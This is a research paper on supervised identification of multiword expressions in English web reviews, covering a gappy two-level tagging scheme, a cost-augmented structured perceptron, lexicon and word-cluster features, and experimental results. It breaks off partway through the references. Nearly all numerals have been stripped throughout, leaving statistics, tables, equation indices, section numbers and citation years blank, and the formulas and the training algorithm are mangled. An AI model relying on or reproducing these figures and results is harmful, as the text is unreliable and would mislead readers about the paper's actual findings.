there are, broadly speaking, three reasons to group together tokens that are not fully contigu- ous. most commonly, gaps contain internal modifiers, such as good in make good decisions. syntactic con- structions such as the passive can result in gaps that might not otherwise be present: in good decisions were made, there is instead a gap filled by the pas- sive auxiliary. finally, some mwes may take internal arguments: they gave me a break. figure has addi- tional examples. multiple gaps can occur even within the same expression, though it is rare: they agreed to give bob a well-deserved break. strength. the annotation scheme has two “strength” levels for mwes. clearly idiomatic ex- pressions are marked as strong mwes, while mostly compositional but especially frequent collocations/ phrases (e.g., abundantly clear and patently obvious) are marked as weak mwes. weak multiword groups are allowed to include strong mwes as constituents (but not vice versa). strong groups are required to cohere when used inside weak groups: that is, a weak group cannot include only part of a strong group. for purposes of annotation, there were no constraints hinging on the ordering of tokens in the sentence. process. mwe annotation proceeded one sentence at a time. the annotators referred to and improved the guidelines document on an ongoing basis. every sentence was seen independently by at least an- notators, and differences of opinion were discussed and resolved (often by marking a weak mwe as a compromise). see schneider et al. ( ) for details. statistics. the annotated corpus consists of documents ( , sentences). mwes are frequent in this domain: % of sentences ( % of sentences over words long) and % of documents contain at least one mwe. , / , = % of tokens belong to an mwe; in total, there are , mwe instances. ( %) are strong mwes containing a gold-tagged proper noun—most are proper names. a breakdown appears in table . representation and task definition we define a lexical segmentation of a sentence as a partitioning of its tokens into segments such that each segment represents a single unit of lexical meaning. a multiword lexical expression may contain gaps, i.e. interruptions by other segments. we impose two restrictions on gaps that appear to be well-motivated linguistically: • projectivity: every expression filling a gap must be completely contained within that gap; gappy expressions may not interleave. • no nested gaps: a gap in an expression may be filled by other single- or multiword expressions, so long as those do not themselves contain gaps. formal grammar. our scheme corresponds to the following extended cfg (thatcher, ), where s is the full sentence and terminals w are word tokens: s → x+ x → w+ (y+ w+)∗ y → w+ each expression x or y is lexicalized by the words in one or more underlined variables on the right-hand side. an x constituent may optionally contain one or more gaps filled by y constituents, which must not contain gaps themselves. mwes with multiple gaps are rare but attested in data: e.g., putting me at my ease. we encountered one violation of the gap nesting constraint in the reviews data: i have nothing but fantastic things to say . additionally, the interrupted phrase denoting multiword groupings with subscripts, my wife had taken her ’ ford fusion in for a routine oil change contains multiword groups—{taken, in}, {’ , ford, fusion}, {oil, change}—and single-word groups. 
the first mwe is gappy (accentuated by the box); a single word and a contiguous multiword group fall within the gap. the projectivity constraint forbids an analysis like taken her ' ford fusion, while the gap nesting constraint forbids taken her ' ford fusion in. (footnote: the interrupted phrase great gateways never before, so far as hudson knew, seen by europeans was annotated in another corpus.)

. two-level scheme: strong vs. weak mwes

our annotated data distinguish two strengths of mwes as discussed in § . augmenting the grammar of the previous section, we therefore designate nonterminals as strong (X, Y) or weak (X̃, Ỹ):

S → X̃+
X̃ → X+ (Ỹ+ X+)*
X → w+ (Ỹ+ w+)*
Ỹ → Y+
Y → w+

a weak mwe may be lexicalized by single words and/or strong multiwords. strong multiwords cannot contain weak multiwords except in gaps. further, the contents of a gap cannot be part of any multiword that extends outside the gap. (footnote: this was violated a small number of times in our annotated data: modifiers within gaps are sometimes collocated with the gappy expression, as in on a tight budget and have little doubt.) for example, consider the segmentation: he was willing to budge a little on the price which means a lot to me. subscripts denote strong mw groups and superscripts weak mw groups; unmarked tokens serve as single-word expressions. the mw groups are thus {budge, on}, {a, little}, {a, lot}, and {means, {a, lot}, to, me}. as should be evident from the grammar, the projectivity and gap-nesting constraints apply here just as in the 1-level scheme.

. evaluation

matching criteria. given that most tokens do not belong to an mwe, to evaluate mwe identification we adopt a precision/recall-based measure from the coreference resolution literature. the muc criterion (vilain et al., ) measures precision and recall of links in terms of the groups (units) implied by the transitive closure over those links. it can be defined as follows: let $a - b$ denote a link between two elements in the gold standard, and $a \,\hat{-}\, b$ denote a link in the system prediction. let the $*$ operator denote the transitive closure over all links, such that $\llbracket a -^{*} b \rrbracket$ is 1 if $a$ and $b$ belong to the same (gold) set, and 0 otherwise. assuming there are no redundant links within any annotation (which in our case is guaranteed by linking consecutive words in each mwe), we can write the muc precision and recall measures as:

$P = \dfrac{\sum_{a,b:\, a \hat{-} b} \llbracket a -^{*} b \rrbracket}{\sum_{a,b:\, a \hat{-} b} 1} \qquad R = \dfrac{\sum_{a,b:\, a - b} \llbracket a \,\hat{-}^{*} b \rrbracket}{\sum_{a,b:\, a - b} 1}$

this awards partial credit when predicted and gold expressions overlap in part. requiring full mwes to match exactly would arguably be too stringent, over-penalizing larger mwes for minor disagreements. we combine precision and recall using the standard f measure (their harmonic mean). this is the link-based evaluation used for most of our experiments. for comparison, we also report some results with a more stringent exact match evaluation where the span of the predicted mwe must be identical to the span of the gold mwe for it to count as correct.
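a small worked sketch of this link-based measure follows. it treats each mwe group as a set of token indices, links consecutive members, and computes muc precision, recall, and f; it is an illustrative reimplementation of the definitions above, not the authors' evaluation code, and the names and toy example are ours.

```python
def links(groups):
    """Represent each MWE group by links between consecutive token indices."""
    out = []
    for g in groups:
        g = sorted(g)
        out.extend(zip(g, g[1:]))   # an n-element group yields n-1 links
    return out

def same_set(a, b, groups):
    """Transitive-closure test: do a and b belong to the same group?"""
    return any(a in g and b in g for g in groups)

def muc_scores(gold_groups, pred_groups):
    gold_links, pred_links = links(gold_groups), links(pred_groups)
    # precision: fraction of predicted links whose endpoints share a gold group
    p = (sum(same_set(a, b, gold_groups) for a, b in pred_links) / len(pred_links)
         if pred_links else 1.0)
    # recall: fraction of gold links whose endpoints share a predicted group
    r = (sum(same_set(a, b, pred_groups) for a, b in gold_links) / len(gold_links)
         if gold_links else 1.0)
    f = 2 * p * r / (p + r) if p + r else 0.0
    return p, r, f

# toy example: the prediction recovers only part of a gappy gold group
gold = [{3, 4, 7}, {8, 9}]
pred = [{3, 4}, {8, 9}]
print(muc_scores(gold, pred))   # partial credit: P = 1.0, R = 2/3
```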
strength averaging. recall that the 2-level scheme (§ . ) distinguishes strong vs. weak links/groups, where the latter category applies to reasonably compositional collocations as well as ambiguous or difficult cases. where one annotation uses a weak link and the other has a strong link or no link at all, we want to penalize the disagreement less than if one had a strong link and the other had no link. to accommodate the 2-level scheme, we therefore average $F_\uparrow$, in which all weak links have been converted to strong links, and $F_\downarrow$, in which they have been removed: $F = \frac{1}{2}(F_\uparrow + F_\downarrow)$. if neither annotation contains any weak links, this equals the muc score because $F = F_\uparrow = F_\downarrow$. this method applies to both the link-based and exact match evaluation criteria. (footnote: as a criterion for coreference resolution, the muc measure has perceived shortcomings which have prompted several other measures (see recasens and hovy for a review). it is not clear, however, whether any of these criticisms are relevant to mwe identification.) (footnote: a link between a and b is redundant if the other links already imply that a and b belong to the same set. a set of n elements is expressed non-redundantly with exactly n − 1 links.) (footnote: overall precision and recall are likewise computed by averaging "strengthened" and "weakened" measurements.)

figure : examples and regular expressions for the four tagging schemes, applied to the sentence he was willing to budge a little on the price which means a lot to me. the regular expressions are: no gaps, 1-level (O|B I+)+; no gaps, 2-level (O|B [Ī Ĩ]+)+; gappy, 1-level (O|B (o|b i+|i)* I+)+; gappy, 2-level (O|B (o|b [ī ĩ]+|[ī ĩ])* [Ī Ĩ]+)+. strong links are depicted with solid arcs, and weak links with dotted arcs. the bottom analysis was provided by an annotator; the ones above are simplifications.

tagging schemes

following ramshaw and marcus ( ), shallow analysis is often modeled as a sequence-chunking task, with tags containing chunk-positional information. the bio scheme and variants (e.g., bilou; ratinov and roth, ) are standard for tasks like named entity recognition, supersense tagging, and shallow parsing. the language of derivations licensed by the grammars in § allows for a tag-based encoding of mwe analyses with only bigram constraints. we describe four tagging schemes for mwe identification, starting with bio and working up to more expressive variants. they are depicted in figure .

no gaps, 1-level (3 tags). this is the standard contiguous chunking representation from ramshaw and marcus ( ) using the tags {O B I}. O is for tokens outside any chunk; B marks tokens beginning a chunk; and I marks other tokens inside a chunk. multiword chunks will thus start with B and then I. B must always be followed by I; I is not allowed at the beginning of the sentence or following O.

no gaps, 2-level (4 tags). we can distinguish strength levels by splitting I into two tags: Ī for strong expressions and Ĩ for weak expressions. to express strong and weak contiguous chunks requires 4 tags: {O B Ī Ĩ}. (marking B with a strength as well would be redundant because mwes are never length-one chunks.) the constraints on Ī and Ĩ are the same as the constraints on I in previous schemes. if Ī and Ĩ occur next to each other, the strong attachment will receive higher precedence, resulting in analysis of strong mwes as nested within weak mwes.

gappy, 1-level (6 tags). because gaps cannot themselves contain gappy expressions (we do not support full recursivity), a finite number of additional tags are sufficient to encode gappy chunks. we therefore add lowercase tag variants representing tokens within a gap: {O o B b I i}.
in addition to the con- straints stated above, no within-gap tag may occur at the beginning or end of the sentence or immediately following or preceding o. within a gap, b, i, and o behave like their out-of-gap counterparts. gappy, -level ( tags). tags are required to en- code the -level scheme with gaps: {o o b b ī ı̄ ĩ ı̃}. variants of the inside tag are marked for strength of the incoming link—this applies gap-externally (capi- talized tags) and gap-internally (lowercase tags). if ī or ĩ immediately follows a gap, its diacritic reflects the strength of the gappy expression, not the gap’s contents. model with the above representations we model mwe iden- tification as sequence tagging, one of the paradigms that has been used previously for identifying con- tiguous mwes (constant and sigogne, , see § ). constraints on legal tag bigrams are sufficient to ensure the full tagging is well-formed subject to the regular expressions in figure ; we enforce these hierarchical modeling based on our representations is left to future work. constraints in our experiments. in nlp, conditional random fields (lafferty et al., ) and the structured perceptron (collins, ) are popular techniques for discriminative sequence modeling with a convex loss function. we choose the second approach for its speed: learning and in- ference depend mainly on the runtime of the viterbi algorithm, whose asymptotic complexity is linear in the length of the input and (with a first-order markov assumption) quadratic in the number of tags. below, we review the structured perceptron and discuss our cost function, features, and experimental setup. . cost-augmented structured perceptron the structured perceptron’s (collins, ) learn- ing procedure, algorithm , generalizes the classic perceptron algorithm (freund and schapire, ) to incorporate a structured decoding step (for sequences, the viterbi algorithm) in the inner loop. thus, train- ing requires only max inference, which is fast with a first-order markov assumption. in training, features are adjusted where a tagging error is made; the pro- cedure can be viewed as optimizing the structured hinge loss. the output of learning is a weight vector that parametrizes a feature-rich scoring function over candidate labelings of a sequence. to better align the learning algorithm with our f -score–based mwe evaluation (§ . ), we use a cost-augmented version of the structured perceptron that is sensitive to different kinds of errors during training. when recall is the bigger obstacle, we can adopt the following cost function: given a sentence x, its gold labeling y∗, and a candidate labeling y′, cost(y∗,y′,x) = ∣y ∗∣∑ j= c(y ∗ j ,y ′ j) where c(y∗,y′) = ⟦y∗ ≠ y′⟧+ρ⟦y∗ ∈ {b,b}∧y′ ∈ {o,o}⟧ a single nonnegative hyperparameter, ρ , controls the tradeoff between recall and accuracy; higher ρ biases the model in favor of recall (possibly hurt- ing accuracy and precision). this is a slight variant of the recall-oriented cost function of mohit et al. ( ). the difference is that we only penalize beginning-of-expression recall errors. preliminary the -tag scheme licenses tag bigrams: sequences such as b o and o ı̄ are prohibited. there are also constraints on the allowed tags at the beginning and end of the sequence. 
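the per-token cost just defined is simple enough to state directly in code. the sketch below is an illustration of that definition (tags as strings, ρ as a float), not the authors' released implementation, and the function names are ours.

```python
def token_cost(gold_tag, pred_tag, rho):
    """c(y*, y'): 1 for any mismatch, plus rho when a gold B/b is predicted
    as O/o, i.e. a beginning-of-expression recall error."""
    cost = 1.0 if gold_tag != pred_tag else 0.0
    if gold_tag in ("B", "b") and pred_tag in ("O", "o"):
        cost += rho
    return cost

def sequence_cost(gold_tags, pred_tags, rho):
    """cost(y*, y', x): sum of per-token costs over the sentence."""
    return sum(token_cost(g, p, rho) for g, p in zip(gold_tags, pred_tags))
```

because the cost decomposes over positions, cost-augmented decoding only requires adding a per-position, per-tag bonus to the model scores before running viterbi.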
input: data ⟨⟨x(n),y(n)⟩⟩n n= ; number of iterations m w ← w ← t ← for m = to m do for n = to n do⟨x,y⟩ ← ⟨x(n),y(n)⟩ ŷ ← arg maxy′ (w⊺g(x,y′)+cost(y,y′,x)) if ŷ ≠ y then w ← w+g(x,y)−g(x,ŷ) w ← w+tg(x,y)−tg(x,ŷ) end t ← t + end end output: w−(w/t) algorithm : training with the averaged perceptron. (adapted from daumé, , p. .) experiments showed that a cost function penalizing all recall errors—i.e., with ρ⟦y∗ ≠ o∧ y′ = o⟧ as the second term, as in mohit et al.—tended to append additional tokens to high-confidence mwes (such as proper names) rather than encourage new mwes, which would require positing at least two new non- outside tags. . features basic features. these are largely based on those of constant et al. ( ): they look at word unigrams and bigrams, character prefixes and suffixes, and pos tags, as well as lexicon entries that match lemmas of multiple words in the sentence. appendix a lists the basic features in detail. some of the basic features make use of lexicons. we use or construct lists of english mwes: all multiword entries in wordnet (fellbaum, ); all multiword chunks in semcor (miller et al., ); all multiword entries in english wiktionary; the wikimwe dataset mined from english wikipedia (hartmann et al., ); the said database of phrasal lexical idioms (kuiper et al., ); the named entities and other mwes in the wsj corpus on the english side of the cedt (hajič et al., ); the wordnet api in nltk (bird et al., ) was used for lemmatization. http://en.wiktionary.org; data obtained from https://toolserver.org/~enwikt/definitions/ enwikt-defs- -en.tsv.gz lookup supervised model preexising lexicons entries max gap length p r f σ p r f σ none . . . . wordnet + semcor k . . . . . . . . lexicons k . . . . . . . . lexicons k . . . . . . . . best configuration with in-domain lexicon . . . . . . . . lexicons + mwtypes(train)≥ lexicons + mwtypes(train)≥ table : use of lexicons for lookup-based vs. statistical segmentation. supervised learning used only basic features and the structured perceptron, with the -tag scheme. results are with the link-based matching criterion for evaluation. top: comparison of preexisting lexicons. “ lexicons” refers to wordnet and semcor plus said, wikimwe, phrases.net, and english wiktionary; “ lexicons” adds mwes from cedt, vnc, lvc, and oyz. (in these lookup-based configurations, allowing gappy mwes never helps performance.) bottom: combining preexisting lexicons with a lexicon derived from mwes annotated in the training portion of each cross-validation fold at least once (lookup) or twice (model). all precision, recall, and f percentages are averaged across folds of cross-validation on train; standard deviations are shown for the f score. in each column, the highest value using only preexisting lexicons is underlined, and the highest overall value is bolded. the boxed row indicates the configuration used as the basis for subsequent experiments. the verb-particle constructions (vpcs) dataset of (baldwin, ); a list of light verb constructions (lvcs) provided by claire bonial; and two idioms websites. after preprocessing, each lexical entry consists of an ordered sequence of word lemmas, some of which may be variables like <something>. given a sentence and one or more of the lexicons, lookup proceeds as follows: we enumerate entries whose lemma sequences match a sequence of lemma- tized tokens, and build a lattice of possible analyses over the sentence. 
we find the shortest path (i.e., using as few expressions as possible) with dynamic programming, allowing gaps of up to length . unsupervised word clusters. distributional clus- tering on large (unlabeled) corpora can produce lexi- cal generalizations that are useful for syntactic and semantic analysis tasks (e.g.: miller et al., ; koo et al., ; turian et al., ; owoputi et al., ; grave et al., ). we were interested to see whether a similar pattern would hold for mwe identification, given that mwes are concerned with what is lexi- cally idiosyncratic—i.e., backing off from specific lexemes to word classes may lose the mwe-relevant information. brown clustering (brown et al., ) http://www.phrases.net/ and http://home. postech.ac.kr/~oyz/doc/idiom.html each top-level lexical expression (single- or multiword) incurs a cost of ; each expression within a gap has cost . . with liang’s ( ) implementation: https://github. com/percyliang/brown-cluster. we obtain , clusters on the -million-word yelp academic dataset (which is similar in genre to the annotated web re- views data) gives us a hard clustering of word types. to our tagger, we add features mapping the previ- ous, current, and next token to brown cluster ids. the feature for the current token conjoins the word lemma with the cluster id. part-of-speech tags. we compared three ptb- style pos taggers on the full reviews subcor- pus (train+test). the stanford corenlp tagger (toutanova et al., ) yields an accuracy of . %. the ark tweetnlp tagger v. . . (owoputi et al., ) achieves . % with the model trained on the twitter corpus of ritter et al. ( ), and . % when trained on the answers, email, newsgroup, and weblog subcorpora of wtb. we use this third con- figuration to produce automatic pos tags for training and testing our mwe tagger. (a comparison condi- tion in § . uses oracle pos tags.) . experimental setup the corpus of web reviews described in § is used for training and evaluation. arbitrarily chosen documents ( sentences, , words) were held from words appearing at least times. https://www.yelp.com/academic_dataset v. . . , with english-bidirectional-distsim http://www.ark.cs.cmu.edu/tweetnlp/model. ritter_ptb_alldata_fixed. link-based exact match configuration m ρ ∣w∣ p r f p r f base model — , k . . . . . . + recall cost , k . . . . . . + clusters , k . . . . . . + oracle pos , k . . . . . . table : comparison of supervised models on test (using the -tag scheme). the base model corresponds to the boxed result in table table , but here evaluated on test. for each configuration, the number of training iterations m and (except for the base model) the recall-oriented hyperparameter ρ were tuned by cross-validation on train. out as a final test set. this left , sentences/ , words for training/development (train). fea- ture engineering and hyperparameter tuning were conducted with -fold cross-validation on train. the -tag scheme is used except where otherwise noted. in learning with the structured perceptron (algo- rithm ), we employ two well-known techniques that can both be viewed as regularization. first, we use the average of parameters over all timesteps of learn- ing. second, within each cross-validation fold, we de- termine the number of training iterations (epochs) m by early stopping—that is, after each iteration, we use the model to decode the held-out data, and when that accuracy ceases to improve, use the previous model. the two hyperparameters are the number of iterations and the value of the recall cost hyperparameter (ρ ). 
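the lookup procedure described above (matching lexicon entries against lemma sequences and taking a shortest path through the resulting lattice) can be approximated with a small dynamic program. the sketch below handles only contiguous matches and minimizes the number of expressions; the gap handling and the gap-cost weighting mentioned in the text are omitted, and the lexicon format and function names are assumptions rather than the authors' code.

```python
def lookup_segment(lemmas, lexicon, max_len=8):
    """Shortest-path segmentation: cover the sentence with as few expressions
    as possible, where an expression is a lexicon entry or a single word.

    `lexicon` is a set of lemma tuples, e.g. {("pay", "attention", "to")}.
    """
    n = len(lemmas)
    best = [0] + [float("inf")] * n     # best[i]: fewest expressions covering lemmas[:i]
    back = [None] * (n + 1)             # backpointer to the start of the last segment
    for i in range(1, n + 1):
        for j in range(max(0, i - max_len), i):
            span = tuple(lemmas[j:i])
            if len(span) == 1 or span in lexicon:
                if best[j] + 1 < best[i]:
                    best[i], back[i] = best[j] + 1, j
    segments, i = [], n
    while i > 0:
        j = back[i]
        segments.append(tuple(lemmas[j:i]))
        i = j
    return list(reversed(segments))

lexicon = {("pay", "attention"), ("attention", "to"), ("pay", "attention", "to")}
print(lookup_segment(["please", "pay", "attention", "to", "detail"], lexicon))
# [('please',), ('pay', 'attention', 'to'), ('detail',)]
```

as the example shows, preferring fewer expressions resolves overlapping matches in favor of the longest available entry, which mirrors the behavior of the lexicon-lookup baseline evaluated below.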
both are tuned via cross-validation on train; we use the multiple of that maximizes average link-based f . the chosen values are shown in table . experi- ments were managed with the ducttape tool. results we experimentally address the following questions to probe and justify our modeling approach. . is supervised learning necessary? previous mwe identification studies have found benefit to statistical learning over heuristic lexicon lookup (constant and sigogne, ; green et al., ). our first experiment tests whether this holds for comprehensive mwe identification: it compares our supervised tagging approach with baselines of heuristic lookup on preexisting lexicons. the base- lines construct a lattice for each sentence using the same method as lexicon-based model features (§ . ). if multiple lexicons are used, the union of their en- https://github.com/jhclark/ducttape/ tries is used to construct the lattice. the resulting segmentation—which does not encode a strength distinction—is evaluated against the gold standard. table shows the results. even with just the la- beled training set as input, the supervised approach beats the strongest heuristic baseline (that incorpo- rates in-domain lexicon entries extracted from the training data) by precision points, while achieving comparable recall. for example, the baseline (but not the statistical model) incorrectly predicts an mwe in places to eat in baltimore (because eat in, meaning ‘eat at home,’ is listed in wordnet). the supervised approach has learned not to trust wordnet too much due to this sort of ambiguity. downstream applica- tions that currently use lexicon matching for mwe identification (e.g., ghoneim and diab, ) likely stand to benefit from our statistical approach. . how best to exploit mwe lexicons (type-level information)? for statistical tagging (right portion of table ), using more preexisting (out-of-domain) lexicons generally improves recall; precision also improves a bit. a lexicon of mwes occurring in the non-held-out training data at least twice (table , bottom right) is marginally worse (better precision/worse recall) than the best result using only preexisting lexicons. . variations on the base model we experiment with some of the modeling alterna- tives discussed in § . results appear in table under both the link-based and exact match evaluation cri- teria. we note that the exact match scores are (as expected) several points lower. if we train with access to the full lexicon of training set mwes, the learner credulously overfits to relying on that lexicon—after all, it has perfect coverage of the training data!— which proves fatal for the model at test time. recall-oriented cost. the recall-oriented cost adds about link-based f point, sacrificing precision in favor of recall. unsupervised word clusters. when combined with the recall-oriented cost, these produce a slight improvement to precision/degradation to recall, im- proving exact match f but not affecting link-based f . only a few clusters receive high positive weight; one of these consists of matter, joke, biggie, pun, avail, clue, corkage, frills, worries, etc. these words are diverse semantically, but all occur in collocations with no, which is what makes the cluster coherent and useful to the mwe model. oracle part-of-speech tags. using human- annotated rather than automatic pos tags improves mwe identification by about f points on test (similar differences were observed in development). . what are the highest-weighted features? 
an advantage of the linear modeling framework is that we can examine learned feature weights to gain some insight into the model’s behavior. in general, the highest-weighted features are the lexicon matching features and features indicative of proper names (pos tag of proper noun, capitalized word not at the beginning of the sentence, etc.). despite the occasional cluster capturing colloca- tional or idiomatic groupings, as described in the previous section, the clusters appear to be mostly useful for identifying words that tend to belong (or not) to proper names. for example, the cluster with street, road, freeway, highway, airport, etc., as well as words outside of the cluster vocabulary, weigh in favor of an mwe. a cluster with everyday desti- nations (neighborhood, doctor, hotel, bank, dentist) prefers non-mwes, presumably because these words are not typically part of proper names in this corpus. this was from the best model using non-oracle pos tags, so the clusters are perhaps useful in correct- ing for proper nouns that were mistakenly tagged as common nouns. one caveat, though, is that it is hard to discern the impact of these specific features where others may be capturing essentially the same information. . how heterogeneous are learned mwes? on test, the final model (with automatic pos tags) predicts mwe instances ( are gappy; are pos pattern # examples (lowercased lemmas) noun noun customer service, oil change verb prep work with, deal with, yell at propn propn eagle transmission, comfort zone adj noun major award, top notch, mental health verb part move out, end up, pick up, pass up verb adv come back, come in, come by, stay away prep noun on time, in fact, in cash, for instance verb noun take care, make money, give crap verb pron thank you, get it prep prep out of, due to, out ta, in between adv adv no matter, up front, at all, early on det noun a lot, a little, a bit, a deal verb det noun answer the phone, take a chance noun prep kind of, care for, tip on, answer to table : top predicted pos patterns and frequencies. weak). there are unique mwe types. organizing the predicted mwes by their coarse pos sequence reveals that the model is not too preju- diced in the kinds of expressions it recognizes: the types fall under unique pos+strength patterns. table shows the pos sequences predicted or more times as strong mwes. some of the examples (major award, a deal, tip on) are false positives, but most are correct. singleton patterns include propn verb (god forbid), prep det (at that), adj pron (worth it), and prep verb prep (to die for). true positive mwes mostly consist of (a) named entities, and (b) lexical idioms seen in training and/or listed in one of the lexicons. occasionally the sys- tem correctly guesses an unseen and oov idiom based on features such as hyphenation (walk - in) and capitalization/oov words (chili relleno, big mis- take). on test, gold mwe types were unseen in training; the system found true positives (where the type was predicted at least once), false posi- tives, and false negatives—an unseen type recall rate of %. removing types that occurred in lexi- cons leaves true positives, false positives, and false negatives—a unseen and oov type recall rate of %. . what kinds of mismatches occur? inspection of the output turns up false positives due to ambiguity (e.g., spongy and sweet bread); false negatives (top to bottom); and overlap (get high qual- ity service, gold get high quality service; live up to, gold live up to). 
a number of the mismatches turn scheme ∣y∣ ρ m ∣w∣ p r f no gaps, -level . k . . . no gaps, -level . k . . . gappy, -level . , k . . . gappy, -level . , k . . . table : training with different tagging schemes. results are cross-validation averages on train. all schemes are evaluated against the full gold standard ( tags). out to be problems with the gold standard, like hav- ing our water shut off (gold having our water shut off ). this suggests that even noisy automatic taggers might help identify annotation inconsistencies and errors for manual correction. . are gappiness and the strength distinction learned in practice? three quarters of mwes are strong and contain no gaps. to see whether our model is actually sensi- tive to the phenomena of gappiness and strength, we train on data simplified to remove one or both distinctions—as in the first labelings in figure — and evaluate against the full -tag scheme. for the model with the recall cost, clusters, and oracle pos tags, we evaluate each of these simplifications of the training data in table . the gold standard for evaluation remains the same across all conditions. if the model was unable to recover gappy expres- sions or the strong/weak distinction, we would expect it to do no better when trained with the full tagset than with the simplified tagset. however, there is some loss in performance as the tagset for learning is sim- plified, which suggests that gappiness and strength are being learned to an extent. related work our annotated corpus (schneider et al., ) joins several resources that indicate certain varieties of mwes: lexicons such as wordnet (fellbaum, ), said (kuiper et al., ), and wikimwe (hartmann et al., ); targeted lists (baldwin, , ; cook et al., ; tu and roth, , ); web- sites like wiktionary and phrases.net; and large-scale corpora such as semcor (miller et al., ), the french treebank (abeillé et al., ), the szeged- paralellfx corpus (vincze, ), and the prague czech-english dependency treebank (čmejrek et al., ). the difference is that schneider et al. ( ) pursued a comprehensive annotation approach rather than targeting specific varieties of mwes or relying on a preexisting lexical resource. the annotations are shallow, not relying explicitly on syntax (though in principle they could be mapped onto the parses in the web treebank). in terms of modeling, the use of machine learn- ing classification (hashimoto and kawahara, ; shigeto et al., ) and specifically bio sequence tagging (diab and bhutada, ; constant and si- gogne, ; constant et al., ; vincze et al., ) for contextual recognition of mwes is not new. lexical semantic classification tasks like named entity recognition (e.g., ratinov and roth, ), su- persense tagging (ciaramita and altun, ; paaß and reichartz, ), and index term identification (newman et al., ) also involve chunking of cer- tain mwes. but our discriminative models, facili- tated by the new corpus, broaden the scope of the mwe identification task to include many varieties of mwes at once, including explicit marking of gaps and a strength distinction. by contrast, the afore- mentioned identification systems, as well as some mwe-enhanced syntactic parsers (e.g., green et al., ), have been restricted to contiguous mwes. however, green et al. ( ) allow gaps to be de- scribed as constituents in a syntax tree. gimpel and smith’s ( ) shallow, gappy language model al- lows arbitrary token groupings within a sentence, whereas our model imposes projectivity and nest- ing constraints (§ ). 
blunsom and baldwin ( ) present a sequence model for hpsg supertagging, and evaluate performance on discontinuous mwes, though the sequence model treats the non-adjacent component supertags like other labels—it cannot en- force that they mutually require one another, as we do via the gappy tagging scheme (§ . ). the lexicon lookup procedures of bejček et al. ( ) can match gappy mwes, but are nonstatistical and extremely error-prone when tuned for high oracle recall. another major thread of research has pursued un- supervised discovery of multiword types from raw corpora, such as with statistical association measures (church et al., ; pecina, ; ramisch et al., , inter alia), parallel corpora (melamed, ; moirón and tiedemann, ; tsvetkov and wint- ner, ), or a combination thereof (tsvetkov and wintner, ); this may be followed by a lookup- and-classify approach to contextual identification (ramisch et al., ). though preliminary experi- ments with our models did not show benefit to incor- porating such automatically constructed lexicons, we hope these two perspectives can be brought together in future work. conclusion this article has presented the first supervised model for identifying heterogeneous multiword expressions in english text. our feature-rich discriminative se- quence tagger performs shallow chunking with a novel scheme that allows for mwes containing gaps, and includes a strength distinction to separate highly idiomatic expressions from collocations. it is trained and evaluated on a corpus of english web reviews that are comprehensively annotated for multiword expressions. beyond the training data, its features in- corporate evidence from external resources—several lexicons as well as unsupervised word clusters; we show experimentally that this statistical approach is far superior to identifying mwes by heuristic lexicon lookup alone. future extensions might integrate addi- tional features (e.g., exploiting statistical association measures computed over large corpora), enhance the lexical representation (e.g., by adding semantic tags), improve the expressiveness of the model (e.g., with higher-order features and inference), or integrate the model with other tasks (such as parsing and transla- tion). our data and open source software are released at http://www.ark.cs.cmu.edu/lexsem/. acknowledgments this research was supported in part by nsf ca- reer grant iis- , google through the read- ing is believing project at cmu, and darpa grant fa - - - funded under the deft program. we are grateful to kevin knight, martha palmer, claire bonial, lori levin, ed hovy, tim baldwin, omri abend, members of jhu clsp, the nlp group at berkeley, and the noah’s ark group at cmu, and anonymous reviewers for valuable feedback. a basic features all are conjoined with the current label, yi. label features . previous label (the only first-order feature) token features original token . i = { , } . i = ∣w∣−{ , } . capitalized ∧ ⟦i = ⟧ . word shape lowercased token . prefix: [wi]k ∣ k= . suffix: [wi]∣w∣j ∣∣w∣j=∣w∣− . has digit . has non-alphanumeric c . context word: w j ∣i+ j=i− . context word bigram: w j+ j ∣i+ j=i− lemma features . lemma + context lemma if one of them is a verb and the other is a noun, verb, adjective, adverb, preposition, or particle: λi ∧ λ j ∣i+ j=i− part-of-speech features . context pos: pos j ∣i+ j=i− . context pos bigram: pos j+ j ∣i+ j=i− . word + context pos: wi ∧posi± . context word + pos: wi± ∧posi lexicon features (unlexicalized) wordnet only . 
oov: λi is not in wordnet as a unigram lemma ∧ posi . compound: non-punctuation lemma λi and the {previous, next} lemma in the sentence (if it is non-punctuation; an inter- vening hyphen is allowed) form an entry in wordnet, possibly separated by a hyphen or space . compound-hyphen: posi = hyph ∧ previous and next tokens form an entry in wordnet, possibly separated by a hyphen or space . ambiguity class: if content word unigram λi is in wordnet, the set of pos categories it can belong to; else posi if not a content pos ∧ the pos of the longest mw match to which λi belongs (if any) ∧ the position in that match (b or i) for each multiword lexicon . lexicon name ∧ status of token i in the shortest path segmen- tation (o, b, or i) ∧ subcategory of lexical entry whose match includes token i, if matched ∧ whether the match is gappy . the above ∧ pos tags of the first and last matched tokens in the expression over all multiword lexicons . at least k lexicons contain a match that includes this token (if n ≥ matches, n active features) . at least k lexicons contain a match that includes this token, starts with a given pos, and ends with a given pos references anne abeillé, lionel clément, and françois toussenel. . building a treebank for french. in anne abeillé and nancy ide, editors, treebanks, volume of text, speech and language technology, pages – . kluwer academic publishers, dordrecht, the nether- lands. timothy baldwin. . looking for prepositional verbs in corpus data. in proc. of the second acl-sigsem workshop on the linguistic dimensions of prepositions and their use in computational linguistics formalisms and applications, pages – . colchester, uk. timothy baldwin. . a resource for evaluating the deep lexical acquisition of english verb-particle con- structions. in proc. of mwe, pages – . marrakech, morocco. timothy baldwin and su nam kim. . multiword expressions. in nitin indurkhya and fred j. damerau, editors, handbook of natural language processing, second edition. crc press, taylor and francis group, boca raton, florida, usa. eduard bejček, pavel straňák, and pavel pecina. . syntactic identification of occurrences of multiword expressions in text using a lexicon with dependency structures. in proc. of the th workshop on multiword expressions, pages – . atlanta, georgia, usa. gábor berend. . opinion expression mining by ex- ploiting keyphrase extraction. in proc. of th interna- tional joint conference on natural language process- ing, pages – . chiang mai, thailand. ann bies, justin mott, colin warner, and seth kulick. a. english web treebank. technical report ldc t , linguistic data consortium, philadel- phia, pennsylvania, usa. ann bies, justin mott, colin warner, and seth kulick. b. english web treebank. technical report ldc t , linguistic data consortium, philadel- phia, pennsylvania, usa. steven bird, ewan klein, and edward loper. . natu- ral language processing with python: analyzing text with the natural language toolkit. o’reilly media, inc., sebastopol, california, usa. phil blunsom and timothy baldwin. . multilingual deep lexical acquisition for hpsgs via supertagging. in proc. of emnlp, pages – . sydney, australia. peter f. brown, peter v. desouza, robert l. mercer, vin- cent j. della pietra, and jenifer c. lai. . class- based n-gram models of natural language. computa- tional linguistics, ( ): – . marine carpuat and mona diab. . task-based eval- uation of 